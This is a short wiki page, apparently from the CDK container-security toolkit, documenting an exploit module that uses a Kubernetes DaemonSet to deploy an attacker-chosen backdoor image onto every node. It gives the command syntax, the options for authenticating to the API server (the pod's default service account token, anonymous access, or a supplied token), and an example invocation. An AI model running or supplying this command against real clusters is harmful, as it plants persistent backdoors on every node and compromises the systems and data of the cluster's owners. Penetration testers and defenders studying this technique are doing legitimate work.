-
Notifications
You must be signed in to change notification settings - Fork 551
Exploit: k8s backdoor daemonset
cdxy edited this page Jan 20, 2021
·
2 revisions
Deploy target backdoor image to each node via daemonset.
通过daemonset将用户指定的后门镜像部署到每个node。
./cdk run k8s-backdoor-daemonset (default|anonymous|<service-account-token-path>) <image>
Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.
Exploit Options:
<image>: your backdoor image (you can upload it to dockerhub before)
Deploy a pod with image:ubuntu to each node:
./cdk run k8s-backdoor-daemonset default ubuntu